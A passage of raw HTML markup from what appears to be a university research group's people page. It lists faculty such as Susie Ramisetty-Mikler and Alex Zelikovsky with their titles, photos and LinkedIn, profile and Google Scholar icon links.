class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 